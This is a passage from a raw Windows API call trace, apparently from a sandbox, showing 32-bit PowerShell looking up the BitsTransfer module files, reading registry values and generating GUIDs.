(lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\en\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\en\\bitstransfer.psd1")) returned 0xffffffff [0150.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0150.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0150.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0150.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0150.774] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d52c | out: phkResult=0x5a0d52c*=0x410) returned 0x0 [0150.774] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d54c, lpData=0x0, lpcbData=0x5a0d548*=0x0 | out: lpType=0x5a0d54c*=0x1, lpData=0x0, lpcbData=0x5a0d548*=0x56) returned 0x0 [0150.774] RegQueryValueExW (in: hKey=0x410, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0d54c, lpData=0x2bbc200, lpcbData=0x5a0d548*=0x56 | out: lpType=0x5a0d54c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0d548*=0x56) returned 0x0 [0150.774] RegCloseKey (hKey=0x410) returned 0x0 [0150.781] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.format.ps1xml")) returned 0x20 [0150.788] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.format.ps1xml")) returned 0x20 [0150.789] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.format.ps1xml")) returned 0x20 [0150.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0150.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\PSGetModuleInfo.xml", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x53 [0150.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d32c) returned 1 [0150.795] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0d5f0 | out: lpFileInformation=0x5a0d5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d328) returned 1 [0150.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x73 [0150.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x73, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x72 [0150.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d22c) returned 1 [0150.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d4f0 | out: lpFileInformation=0x5a0d4f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d228) returned 1 [0150.800] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.psd1")) returned 0xffffffff [0150.806] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.psm1")) returned 0xffffffff [0150.820] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.cdxml")) returned 0xffffffff [0150.824] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.xaml")) returned 0xffffffff [0150.828] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.ni.dll")) returned 0xffffffff [0150.832] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management.dll")) returned 0xffffffff [0150.837] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psd1")) returned 0xffffffff [0150.846] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psm1")) returned 0xffffffff [0150.854] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.cdxml")) returned 0xffffffff [0150.862] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.xaml")) returned 0xffffffff [0150.870] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.ni.dll")) returned 0xffffffff [0150.877] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.dll")) returned 0xffffffff [0150.878] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0d2a0, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0150.883] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0150.884] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5e [0150.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x5e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x5d [0150.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0150.885] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0150.899] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psd1")) returned 0xffffffff [0150.902] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psm1")) returned 0xffffffff [0150.906] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.cdxml")) returned 0xffffffff [0150.910] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.xaml")) returned 0xffffffff [0150.914] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.ni.dll")) returned 0xffffffff [0150.925] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0150.926] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x64 [0150.926] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x64, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x63 [0150.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0150.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0150.932] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psd1")) returned 0xffffffff [0150.937] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psm1")) returned 0xffffffff [0150.941] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.cdxml")) returned 0xffffffff [0150.946] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.xaml")) returned 0xffffffff [0150.950] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.ni.dll")) returned 0xffffffff [0150.954] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.dll")) returned 0xffffffff [0150.957] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0150.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x66 [0150.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", nBufferLength=0x66, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management", lpFilePart=0x0) returned 0x65 [0150.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d134) returned 1 [0150.959] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0d3f8 | out: lpFileInformation=0x5a0d3f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0150.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d130) returned 1 [0150.964] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psd1")) returned 0xffffffff [0150.968] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.psm1")) returned 0xffffffff [0150.972] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.cdxml")) returned 0xffffffff [0150.976] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.xaml")) returned 0xffffffff [0150.980] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.ni.dll")) returned 0xffffffff [0150.983] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.BackgroundIntelligentTransfer.Management\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.backgroundintelligenttransfer.management\\microsoft.backgroundintelligenttransfer.management.dll")) returned 0xffffffff [0151.016] CoCreateGuid (in: pguid=0x5a0cf50 | out: pguid=0x5a0cf50*(Data1=0xd7ce99f2, Data2=0x6b82, Data3=0x4832, Data4=([0]=0xbd, [1]=0x6f, [2]=0x52, [3]=0xe3, [4]=0xa3, [5]=0xaf, [6]=0x67, [7]=0x6a))) returned 0x0 [0151.022] CoCreateGuid (in: pguid=0x5a0c5dc | out: pguid=0x5a0c5dc*(Data1=0xd268d2f7, Data2=0xb031, Data3=0x4391, Data4=([0]=0xa3, [1]=0x25, [2]=0x6f, [3]=0x2f, [4]=0x5d, [5]=0xe2, [6]=0x13, [7]=0x36))) returned 0x0 [0151.048] CoCreateGuid (in: pguid=0x5a0c89c | out: pguid=0x5a0c89c*(Data1=0xec2342cf, Data2=0x8d2e, Data3=0x4517, Data4=([0]=0xb9, [1]=0xad, [2]=0xce, [3]=0xfe, [4]=0x3f, [5]=0xc4, [6]=0x31, [7]=0xaa))) returned 0x0 [0151.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5a0c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0152.360] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0b208 | out: phkResult=0x5a0b208*=0x0) returned 0x2 [0152.361] RegCloseKey (hKey=0x80000002) returned 0x0 [0152.366] EtwEventRegister () returned 0x0 [0152.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x5a0a90c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0152.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ab54) returned 1 [0152.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0ae18 | out: lpFileInformation=0x5a0ae18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ab50) returned 1 [0152.487] CoCreateGuid (in: pguid=0x5a0b03c | out: pguid=0x5a0b03c*(Data1=0xdd3a1bfd, Data2=0xc575, Data3=0x4c3c, Data4=([0]=0x9f, [1]=0x3f, [2]=0xa4, [3]=0x70, [4]=0x75, [5]=0x61, [6]=0xe2, [7]=0xb1))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x8b1d4829, Data2=0x881b, Data3=0x401c, Data4=([0]=0xb6, [1]=0x78, [2]=0xde, [3]=0x7b, [4]=0x65, [5]=0xa1, [6]=0xfa, [7]=0x4d))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x66ed28fd, Data2=0xab17, Data3=0x4986, Data4=([0]=0x9b, [1]=0x85, [2]=0x1d, [3]=0x81, [4]=0xc8, [5]=0x14, [6]=0x3e, [7]=0x3a))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x7db7cca8, Data2=0x99db, Data3=0x4ea0, Data4=([0]=0x9e, [1]=0x73, [2]=0xfd, [3]=0x75, [4]=0x84, [5]=0x1a, [6]=0x7a, [7]=0x30))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x71568df4, Data2=0xfc70, Data3=0x4d2e, Data4=([0]=0x9e, [1]=0xd5, [2]=0x10, [3]=0x3, [4]=0xb4, [5]=0xd6, [6]=0x42, [7]=0x76))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0xe34c7806, Data2=0xfcfb, Data3=0x4f25, Data4=([0]=0xad, [1]=0x4b, [2]=0x40, [3]=0x89, [4]=0xd0, [5]=0xb0, [6]=0x74, [7]=0xc0))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0xa062bddc, Data2=0x81fd, Data3=0x4c31, Data4=([0]=0x8c, [1]=0x42, [2]=0x36, [3]=0x98, [4]=0x6b, [5]=0x8b, [6]=0x42, [7]=0x2d))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0xb1519de9, Data2=0xa9f7, Data3=0x45d3, Data4=([0]=0xb9, [1]=0x55, [2]=0xb3, [3]=0x9f, [4]=0x86, [5]=0x8d, [6]=0x2d, [7]=0xb6))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x483a51ab, Data2=0xd0a4, Data3=0x4302, Data4=([0]=0x8a, [1]=0xdd, [2]=0xaa, [3]=0x1f, [4]=0xd8, [5]=0x96, [6]=0xee, [7]=0xc2))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x2c23808a, Data2=0x31eb, Data3=0x4b8f, Data4=([0]=0x94, [1]=0x52, [2]=0xc7, [3]=0xcf, [4]=0x99, [5]=0x86, [6]=0x67, [7]=0xc))) returned 0x0 [0152.490] CoCreateGuid (in: pguid=0x5a0b030 | out: pguid=0x5a0b030*(Data1=0x1f5c315, Data2=0x5aba, Data3=0x41e8, Data4=([0]=0xbc, [1]=0x95, [2]=0x16, [3]=0xea, [4]=0x1e, [5]=0xf3, [6]=0xe7, 